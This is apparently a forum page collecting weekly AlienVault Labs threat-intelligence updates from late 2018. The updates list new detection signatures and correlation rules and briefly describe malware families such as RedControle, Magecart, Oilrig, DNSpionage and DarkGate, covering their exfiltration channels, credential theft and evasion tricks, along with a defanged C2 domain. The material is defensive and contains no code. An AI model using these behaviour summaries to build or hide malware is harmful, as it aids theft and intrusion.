• Support
  • Forums
  • Blogs

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

  • AlienVault Labs Threat Intelligence Update for USM Appliance: December 9 – December 15, 2018

    New Detection Techniques - RedControle

    RedControle is a Russian-made backdoor, keylogger, and stealer programmed in Delphi. This particular malware has been found targeting Russian oil, gas, chemical, and agricultural businesses, in addition to major Russian financial exchanges. RedControle uses two command and control servers and can communicate to them via HTTP or HTTPS. According to Cylance, one of the two command and control servers is used to receive commands, while the other is used for exfiltration purposes. It has also been noted that RedControle is tied to other campaigns targeting the Russian Steam and CounterStrike community.

    We've added NIDS signatures and the following correlation rules as a result of RedControle activity:
    • System Compromise, Trojan infection, RedControle Inbound
    • System Compromise, Trojan infection, RedControle Outbound

    New Detection Techniques - Olympic Vision Keylogger

    Olympic Vision is a piece of malware written in .NET that was recently discovered in a campaign targeting multiple organizations across 18 countries. The malware is usually delivered in spear-fishing emails with a lure document attached. Olympic Vision can steal keystrokes, clipboard contents, screenshots, and credentials stored by browsers, email, FTP, and instant messaging clients. For its exfiltration channels, Olympic Vision uses email, FTP, or HTTP.

    We've added NIDS signatures and the following correlation rules as a result of Olympic Vision activity:
    • System Compromise, Trojan infection, Olympic Vision Keylogger

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Trojan infection, Bread and Butter
    • System Compromise, Trojan infection, ELF/Samba
    • System Compromise, Trojan infection, FIN7 GRIFFON
    • System Compromise, Trojan infection, Huitau Outbound
    • System Compromise, Trojan infection, MSIL.Cordis.Stealer
    • System Compromise, Trojan infection, Trojan.Agent.DHUP
    • System Compromise, Trojan infection, VBS.Dunihi
    • System Compromise, Trojan infection, W32.DriverLnk

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Malware RAT, Async
    • System Compromise, Malware RAT, MSIL.NombreRAT

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/Nineap.b
    • System Compromise, Mobile trojan infection, AndroidOS.Agent

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • Exploitation & Installation, Service Exploit, HP Intelligent Management Java Deserialization RCE
    • Exploitation & Installation, Vulnerable software, Google Chrome Pdfium JPEG2000 Heap Overflow
    • System Compromise, Botnet infection, ShieldPush
    • System Compromise, Botnet infection, Win32/HentaiBot
    • System Compromise, C&C Communication, More_eggs SSL activity
    • System Compromise, Malware infection, W32/Pcarrier.A
    • System Compromise, Ransomware infection, Lucky Ransomware

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Trojan infection, Adload
    • System Compromise, Trojan infection, DarkVNC
    • System Compromise, Trojan infection, FIN7 Griffon
    • System Compromise, Trojan infection, Hawkeye Keylogger
    • System Compromise, Trojan infection, MSIL/SocketPlayer RAT
    • System Compromise, Trojan infection, Ursniff
    • System Compromise, Trojan infection, Kimsuky
    • System Compromise, Trojan infection, MSIL/Mintluks.A
    • System Compromise, Trojan infection, NanoCore RAT
    • System Compromise, Trojan infection, Nemucod
    • System Compromise, Trojan infection, Trickbot

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/TrojanDropper.Agent.BL
    • System Compromise, Mobile trojan infection, Asacub.a Banker

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, BrushaLoader SSL
    • System Compromise, C&C Communication, Cobalt Group
    • System Compromise, C&C Communication, HuadhServHelper SSL
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, More Eggs
    • System Compromise, C&C Communication, IcedID

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Malware infection, CoinMiner
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: December 9 – December 15, 2018

    New Detection Techniques - RedControle

    RedControle is a Russian-made backdoor, keylogger, and stealer programmed in Delphi. This particular malware has been found targeting Russian oil, gas, chemical, and agricultural businesses, in addition to major Russian financial exchanges. RedControle uses two command and control servers and can communicate to them via HTTP or HTTPS. According to Cylance, one of the two command and control servers is used to receive commands, while the other is used for exfiltration purposes. It has also been noted that RedControle is tied to other campaigns targeting the Russian Steam and CounterStrike community.

    We've added NIDS signatures and updated the following correlation rule as a result of RedControle activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Olympic Vision Keylogger

    Olympic Vision is a piece of malware written in .NET that was recently discovered in a campaign targeting multiple organizations across 18 countries. The malware is usually delivered in spear-fishing emails with a lure document attached. Olympic Vision can steal keystrokes, clipboard contents, screenshots, and credentials stored by browsers, email, FTP, and instant messaging clients. For its exfiltration channels, Olympic Vision uses email, FTP, or HTTP.

    We've added NIDS signatures and updated the following correlation rule as a result of Olympic Vision activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Bread and Butter, ELF/Samba, FIN7 GRIFFON, Huitau Outbound, MSIL.Cordis.Stealer, Trojan.Agent.DHUP, VBS.Dunihi, and W32.DriverLnk:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Async and MSIL.NombreRAT:
    • System Compromise, Malware Infection, Remote Access Trojan Infection

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android/Nineap.b and AndroidOS.Agent:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • System Compromise, Malware, Trojan Infection
    • System Compromise, Malware, Ransomware Infection
    • Exploitation & Installation, Service Exploit, Code Execution

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Adload, DarkVNC, FIN7 Griffon, Hawkeye Keylogger, MSIL/SocketPlayer RAT, Ursniff, Kimsuky, MSIL/Mintluks.A, NanoCore RAT, Nemucod, and Trickbot:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android/TrojanDropper.Agent.BL and Asacub.a Banker:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated NIDS signatures and updated the following correlation rule as a result of additional recent malicious activity, including CoinMiner:
    • System Compromise, Malware, Trojan Infection
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: December 2 – December 8, 2018

    New Detection Techniques - MageCart

    Magecart refers to a mode of attacker's operation that focuses on skimming card data (or any other type of data available) from payment websites. This technique has been used by many different groups that have evolved over time, pursuing a wide range of data types such as credit cards, credentials, PII, and more. The attackers typically inject code into the infected webpage that will capture and exfiltrate the necessary data before it is encrypted. During the past few months, several international companies have suffered these kind of breaches, involving customer data loss and credit card data theft.
    This week's new rules include several detection systems for any system compromised during the infection process as well as during exfiltration. 

    We've added NIDS signatures and updated the following correlation rule as a result of MageCart activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Astaroth, Canahom.A, MSIL/Criador, MSIL/PartsMiner, STOLENPENCIL, Win32.Black.eoxqwe, Win32.ZZZ1.Stealer, Win32/GodNet, and Win32/LittleTimmy:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Nemours RAT and Win32/SteamStealerRAT:
    • System Compromise, Malware Infection, Remote Access Trojan Infection

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android.Monitor.Cansy.A, Android.Trojan.AutoSMS, Android.Trojan.JSmsHider, Android/Autoins, and Trojan.AndroidOS.AVPass.k:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity:
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware Infection, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - Oilrig

    The Middle Eastern APT group Oilrig, also known as APT34, has been active during the last few years, attacking governments and businesses in the Middle East. Recently, they have been sending phishing emails with attached Word documents. The macro inside the Word document executes a PowerShell script, which uses DNS tunneling to communicate with the Command and Control server. A DNS tunneling attack injects covert information in DNS queries and responses, disguised as normal traffic. The main advantage of using this technique is communicating through a trusted protocol that is commonly overlooked by security teams and can bypass most firewalls. 

    Oilrig uses DNS tunneling to to covertly send and receive commands with the attacker. 

    We've updated NIDS signatures and updated the following correlation rule as a result of Oilrig activity:
    • System Compromise, Malware, APT

    Updated Detection Techniques - Remote Access Tools

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Remcos/Remvio:
    • System Compromise, Malware Infection, Remote Access Trojan Infection

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including AZORult, Generic Stealer, Malicious Ethereum, Obfuscated PowerShell Inbound, Unruy, and Zebrocy:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android Rootnik-AI, Android.Trojan.InfoStealer.MT, Android/GoldenTouch.A!tr, Android/Hiddad.QO, Anubis Android Loader, Asacub.a Banker, and Trojan-SMS.AndroidOS.Opfake:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities, including APT28 SSL activity, BrushaLoader SSL, Cobalt Group SSL, CobaltStrike SSL activity, MalDoc, Malicious SSL Cert (sLoad), Meterpreter SSL Certificate, and Ursnif SSL activity:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Certutil Retrieving EXE, CoinMiner, Golroted, and phishing activity:
    • Delivery & Attack, Malware Infection, Phishing
    • System Compromise, Malware Infection, Downloader
    • System Compromise, Malware Infection, Suspicious Powershell
    • System Compromise, Malware Infection, Suspicious Traffic
    • System Compromise, Malware Infection, Trojan
  • AlienVault Labs Threat Intelligence Update for USM Appliance: December 2 – December 8, 2018

    New Detection Techniques - MageCart

    Magecart refers to a mode of attacker's operation that focuses on skimming card data (or any other type of data available) from payment websites. This technique has been used by many different groups that have evolved over time, pursuing a wide range of data types such as credit cards, credentials, PII, and more. The attackers typically inject code into the infected webpage that will capture and exfiltrate the necessary data before it is encrypted. During the past few months, several international companies have suffered these kind of breaches, involving customer data loss and credit card data theft.
    This week's new rules include several detection systems for any system compromised during the infection process as well as during exfiltration. 

    We've added NIDS signatures and the following correlation rules as a result of MageCart activity:
    • System Compromise, Trojan infection, MageCart

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, Astaroth
    • System Compromise, Trojan infection, Canahom.A
    • System Compromise, Trojan infection, MSIL/Criador
    • System Compromise, Trojan infection, MSIL/PartsMiner
    • System Compromise, Trojan infection, STOLENPENCIL
    • System Compromise, Trojan infection, Win32.Black.eoxqwe
    • System Compromise, Trojan infection, Win32.ZZZ1.Stealer
    • System Compromise, Trojan infection, Win32/GodNet
    • System Compromise, Trojan infection, Win32/LittleTimmy

    New Detection Techniques - Remote Access Tools

    We've added NIDS signatures and the following correlation rules as a result of recent malicious activity:
    • System Compromise, Malware RAT, Nemours RAT
    • System Compromise, Malware RAT, Win32/SteamStealerRAT

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android.Monitor.Cansy.A
    • System Compromise, Mobile trojan infection, Android.Trojan.AutoSMS
    • System Compromise, Mobile trojan infection, Android.Trojan.JSmsHider
    • System Compromise, Mobile trojan infection, Android/Autoins
    • System Compromise, Mobile trojan infection, Trojan.AndroidOS.AVPass.k

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Flash Use-After-Free FWS Inbound (CVE-2018-15982)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Konica Minolta FTP Buffer Overflow Attempt (CVE-2015-7768)
    • System Compromise, Botnet infection, DemonBot
    • System Compromise, C&C Communication, Critical Infr. APT 17-10-2018
    • System Compromise, C&C Communication, PS.APT.PhishDoc.TR Response
    • System Compromise, C&C Communication, PS.APT.PhishDoc.TR
    • System Compromise, C&C Communication, PowerEnum
    • System Compromise, Ransomware infection, WeChat (Ransomware/Stealer)

    Updated Detection Techniques - Oilrig

    The Middle Eastern APT group Oilrig, also known as APT34, has been active during the last few years, attacking governments and businesses in the Middle East. Recently, they have been sending phishing emails with attached Word documents. The macro inside the Word document executes a PowerShell script, which uses DNS tunneling to communicate with the Command and Control server. A DNS tunneling attack injects covert information in DNS queries and responses, disguised as normal traffic. The main advantage of using this technique is communicating through a trusted protocol that is commonly overlooked by security teams and can bypass most firewalls. 

    Oilrig uses DNS tunneling to to covertly send and receive commands with the attacker. 

    We've updated NIDS signatures and the following correlation rule as a result of Oilrig activity:
    • System Compromise, Trojan infection, Oilrig

    Updated Detection Techniques - Remote Access Tools

    We've updated NIDS signatures and the following correlation rule as a result of additional recent malicious activity:
    • System Compromise, Malware RAT, Remcos/Remvio

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, AZORult
    • System Compromise, Trojan infection, Generic Stealer
    • System Compromise, Trojan infection, Malicious Ethereum
    • System Compromise, Trojan infection, Obfuscated PowerShell Inbound
    • System Compromise, Trojan infection, Unruy
    • System Compromise, Trojan infection, Zebrocy

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android Rootnik-AI
    • System Compromise, Mobile trojan infection, Android.Trojan.InfoStealer.MT
    • System Compromise, Mobile trojan infection, Android/GoldenTouch.A!tr
    • System Compromise, Mobile trojan infection, Android/Hiddad.QO
    • System Compromise, Mobile trojan infection, Anubis Android Loader
    • System Compromise, Mobile trojan infection, Asacub.a Banker
    • System Compromise, Mobile trojan infection, Trojan-SMS.AndroidOS.Opfake

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, APT28 SSL activity
    • System Compromise, C&C Communication, BrushaLoader SSL
    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, CobaltStrike SSL activity
    • System Compromise, C&C Communication, MalDoc
    • System Compromise, C&C Communication, Malicious SSL Cert (sLoad)
    • System Compromise, C&C Communication, Meterpreter SSL Certificate
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Delivery & Attack, Malicious website, Phishing activity
    • Delivery & Attack, Suspicious Behaviour, Certutil Retrieving EXE
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Malware infection, Golroted
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: November 25 – December 1, 2018

    New Detection Techniques - DNSpionage

    DNSpionage is the name of an HTTP/DNS espionage campaign targeting several Middle East countries and companies. This campaign uses fake job posting websites to deliver malicious RTF documents to the applicants.

    The infection occurs when the user tries to open one of the malicious files, which contains an application form bundled with an obfuscated macro script. This macro acts as a dropper for an encoded executable file. It also creates a scheduled task to execute the malware every minute.

    The malware then gathers system information and files, and will try to leak it using either HTTP or DNS tunneling. It can also act as an agent, interpreting a set of commands sent by the server to perform actions such as downloading additional scripts and utilites into the machine. The HTTP mode generates traffic to the domain 0ffice36o[.]com. Since the encoded commands are embedded in the domain name prefix, the DNS channel can be also used to send and receive the CnC.

    We've added NIDS signatures and updated the following correlation rule as a result of DNSpionage activity:
    • System Compromise, Malware, Trojan Infection
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5c02eefdd2d9ca140a3c959e

    New Detection Techniques - Responder.py

    SpiderLabs Responder is a project freely available on GitHub that contains the logic to launch a rogue authentication server compatible with several Microsoft network protocols such as NTLM. It can be use to poison LLMNR, NetBios Name Service, and MDNS packets.

    This NBT-NS/LLMNR Responder has been open for four years. During this time, it has extended its functionality, so it can act as a great variety of MS-oriented network nodes. This includes SMB/MSSQL/HTTPS/LDAP/FTP Authentication servers, DNS server, WPAD Proxy server, ICMP redirector, rogue DHCP and network analyzer.

    We've added NIDS signatures and updated the following correlation rule as a result of NTLM Responder activity:
    • Exploitation & Installation, Malware Infection, Hacking Tool

    New Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Apoxas Stealer, Neozhvnc, PowerShell/BlasterEgg, SYSCON, Trojan/Kiaja.a, W32.Sarwent, and Win32/Phorpiex:
    • System Compromise, Malware Infection, Spyware
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Worm

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Banker IcedID, CobalStrike, MalDoc, MSIL/Lordix, MuddyWater, Obfuscated PowerShell Inbound, Qbot, and Zebrocy:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including phishing activity, CoinMiner, Symmi, Asacub.a Banker, and Phorpiex:
    • Delivery & Attack, Malware Infection, Phishing
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware
  • AlienVault Labs Threat Intelligence Update for USM Appliance: November 18 – November 24, 2018

    New Detection Techniques - DarkGate

    DarkGate is a new malware family, initially targeting Spain and Portugal. The malware has multiple payload capabilities, including Cryptocurrency mining, Cryptocurrency stealing, Ransomware infection, keylogging, and remote access. During exploitation, it attempts to obtain as many credentials as possible by leveraging known credential stealer applications: Mail PassView, WebBrowserPassView, ChromeCookiesView, IECookiesView, MZCookiesView, BrowsingHistoryView, and SkypeLogView. Afterwards, it communicates those credentials to the Command & Control, along with other common data fields such as username, computer name, processor type, etc.

    Additionally, the malware has anti-detection capabilities. First, it will not run if the system doesn't have enough resources, since it automatically assumes it is in a VM under forensic investigation. Second, if it detects certain antivirus software, it will try to turn them off, or only execute certain capabilities not detected by that antivirus.

    We've added NIDS signatures and the following correlation rule as a result of DarkGate activity:
    • System Compromise, Trojan infection, DarkGate

    New Detection Techniques - PHPCMS 2008 (CVE-2018-19127)

    The Remote Code Execution vulnerability CVE-2018-19127 leverages a code injection vulnerability in /type.php in PHPCMS 2008. Attackers can send crafted requests to the vulnerable CMS. A lack of filtering in the source code allows all kind of templates to go through and inject code into the system. Despite PHPCMS 2008 not being the latest version available, it is still a very common one. 

    We've added NIDS signatures and the following correlation rules as a result of this activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, PHPCMS 2008 (CVE-2018-19127)

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/Agent.BAA
    • System Compromise, Mobile trojan infection, Android/Locker.PN
    • System Compromise, Mobile trojan infection, Trojan-SMS.AndroidOS.Agent.uf

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Acrobat (CVE-2018-15979)
    • Exploitation & Installation, Hacking tool, JS Downloader Using Wscript.Shell
    • System Compromise, C&C Communication, HuadhServHelper SSL
    • System Compromise, C&C Communication, JS.InfectedMikrotik
    • System Compromise, Malware infection, JS.InfectedMikrotik
    • System Compromise, Trojan infection, Esone CnC Beacon
    • System Compromise, Trojan infection, ExtremeDownloader
    • System Compromise, Trojan infection, Hades APT Downloader
    • System Compromise, Trojan infection, Win32/InstallMonster

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rule as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android.Monitor.Puma

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, BrushaLoader SSL

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Delivery & Attack, Malicious website, Phishing activity
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Ransomware infection, Kraken Ransomware
    • System Compromise, Targeted Malware, APT29
    • System Compromise, Targeted Malware, APT29 SSL Activity
    • System Compromise, Targeted Malware, OceanLotus
    • System Compromise, Trojan infection, BR.Banker
    • System Compromise, Trojan infection, Banload Downloader
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: November 18 – November 24, 2018

    New Detection Techniques - DarkGate

    DarkGate is a new malware family, initially targeting Spain and Portugal. The malware has multiple payload capabilities, including Cryptocurrency mining, Cryptocurrency stealing, Ransomware infection, keylogging, and remote access. During exploitation, it attempts to obtain as many credentials as possible by leveraging known credential stealer applications: Mail PassView, WebBrowserPassView, ChromeCookiesView, IECookiesView, MZCookiesView, BrowsingHistoryView, and SkypeLogView. Afterwards, it communicates those credentials to the Command & Control, along with other common data fields such as username, computer name, processor type, etc.

    Additionally, the malware has anti-detection capabilities. First, it will not run if the system doesn't have enough resources, since it automatically assumes it is in a VM under forensic investigation. Second, if it detects certain antivirus software, it will try to turn them off, or only execute certain capabilities not detected by that antivirus.

    We've added NIDS signatures and updated the following correlation rule as a result of DarkGate activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - PHPCMS 2008 (CVE-2018-19127)

    The Remote Code Execution vulnerability CVE-2018-19127 leverages a code injection vulnerability in /type.php in PHPCMS 2008. Attackers can send crafted requests to the vulnerable CMS. A lack of filtering in the source code allows all kind of templates to go through and inject code into the system. Despite PHPCMS 2008 not being the latest version available, it is still a very common one. 

    We've added NIDS signatures and updated the following correlation rule as a result of this activity:
    • Exploitation & Installation, Exploit, Code Execution

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android/Agent.BAA, Android/Locker.PN, and Trojan-SMS.AndroidOS.Agent.uf:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware Infection, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android.Monitor.Puma:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including phishing activity, CoinMiner, Kraken Ransomware, APT29, APT29 SSL Activity, OceanLotus, BR.Banker, and Banload Downloader:
    • Delivery & Attack, Malware Infection, Phishing
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware
  • AlienVault Labs Threat Intelligence Update for USM Appliance: November 11 – November 17, 2018

    New Detection Techniques - Mylobot

    Mylobot is a very versatile downloader. It was first reported in June by Deep Instinct security research. It also contains anti-sandboxing features. For example, it remains idle after infection for 14 days, after which it starts contacting the CnC server. When it becomes active, it performs massive DNS queries for a set of domains included in a hardcoded list of 1404 domain names.

    The main locations targeted by this malware include the Middle East (Iraq, Iran and Arabia Saudi), East Asia (Vietnam and China), and Argentina.

    We've added NIDS signatures and the following correlation rule as a result of Mylobot activity:
    • System Compromise, Botnet infection, Mylobot
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bec53edbc977065131869ff

    New Detection Techniques - GhostDNS JS DNSChanger

    GhostDNS is a botnet infection spread through infected webpages. It is thought that this botnet has infected around 100,000 home router devices so far. It is unknown how long it has been active so far, but researchers estimate that initial campaigns are one year old.

    The main module of GhostDNS is called DNSChanger. Its activity makes it similar to the malware with the same name. It tries to change the DNS server settings on the infected device, allowing an attacker to route the user traffic. DNSChanger includes three different modules, one of them written in JavaScript. It contains 10 different attack scripts designed to infect a total of 6 different router models.

    Once the DNS table is corrupted, user traffic is routed to phishing websites where they might enter sensitive data such as credit card numerations.

    We've added NIDS signatures and the following correlation rule as a result of additional recent malicious activity:
    • System Compromise, Malicious website, GhostDNS JS DNSChanger
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bb33e3b1106f56a6ce44632

    New Detection Techniques - Urpage Stealer

    Urpage is the name of an unidentified threat actor which may have some connections to Confucious, Patchwork, and Bahamut actors, according to TrendMicro security researchers. Samples share some links, domain names, and file hashes found in the CnC server.

    Urpage targets Android devices. The behaviour is similar to the Confucious and Patchwork stealers. It will try to install several Android applications, including one that looks like a fake Threema, an end-to-end encrypted messaging application. After installation, it starts to gather data, such as SMS, contact lists, audio records, GPS location, system files, and MAC address. It also may install a backdoor module: a customized version of AndroRAT. The CnC traffic is base64 encoded.

    Surprisingly, the same infected web pages serving the Urpage payload for Android devices were found delivering samples of Windows malware.

    We've added NIDS signatures and the following correlation rule as a result of Urpage Stealer activity:
    • System Compromise, Trojan infection, Urpage Stealer
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b86c1af84048207fdac6338

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, JunkMiner Downloader
    • System Compromise, Trojan infection, Operation Baby
    • System Compromise, Trojan infection, Win32.Metamorfo.Banker
    • System Compromise, Trojan infection, Win32/Snowman
    • System Compromise, Trojan infection, Zyro FTP Stealer

    New Detection Techniques - Botnet Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Botnet infection, PhanapikalBot
    • System Compromise, Botnet infection, TeleGbot

    New Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, PredatorTheThief SSL
    • System Compromise, C&C Communication, SocGholish SSL

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Tenda Router Arbitrary Command Injection (CVE-2018-18728)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, WordPress GDPR Plugin Privilege Escalation
    • Exploitation & Installation, Service Exploit, jQuery-File-Upload Unauthenticated File Upload with Suspicious Format
    • System Compromise, Malicious website, Hadoop RCE
    • System Compromise, Malware RAT, HuadhServHelper RAT
    • System Compromise, Mobile trojan infection, AndroidOS.Ramha.a

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, FIN7 Griffon
    • System Compromise, Trojan infection, JS/BrushaLoader CnC
    • System Compromise, Trojan infection, Kryptik
    • System Compromise, Trojan infection, Obfuscated PowerShell Inbound
    • System Compromise, Trojan infection, TinyNuke

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
    • System Compromise, C&C Communication, PSEmpire SSL Activity
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Delivery & Attack, Malicious website, Phishing activity
    • System Compromise, Backdoor, Mocker
    • System Compromise, Botnet infection, ELF/Muhstik
    • System Compromise, Botnet infection, PhanapikalBot
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Mobile trojan infection, Android Rootnik-AI
    • System Compromise, Ransomware infection, Kraken Ransomware
    • System Compromise, Targeted Malware, APT32
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: November 11 – November 17, 2018

    New Detection Techniques - Mylobot

    Mylobot is a very versatile downloader. It was first reported in June by Deep Instinct security research. It also contains anti-sandboxing features. For example, it remains idle after infection for 14 days, after which it starts contacting the CnC server. When it becomes active, it performs massive DNS queries for a set of domains included in a hardcoded list of 1404 domain names.

